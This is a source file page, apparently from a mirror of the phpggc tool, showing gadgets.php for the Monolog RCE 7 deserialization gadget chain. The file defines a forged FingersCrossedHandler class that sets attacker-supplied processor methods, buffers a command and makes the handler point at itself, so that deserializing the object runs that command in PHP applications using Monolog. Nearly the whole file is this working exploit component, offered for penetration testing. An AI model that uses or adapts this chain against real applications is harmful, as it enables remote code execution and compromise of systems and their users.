Codebase list phpggc / 5a62d8b gadgetchains / Monolog / RCE / 7 / gadgets.php
5a62d8b

Tree @5a62d8b (Download .tar.gz)

gadgets.php @5a62d8braw · history · blame

<?php
namespace Monolog\Handler
{
    class FingersCrossedHandler
    {
    	protected $passthruLevel = 0;
        protected $handler;
        protected $buffer;
        protected $processors;
        
        function __construct($methods,$command)
        {
            $this->processors = $methods;
            $this->buffer = [$command];
            $this->handler = $this;
        }
    }
}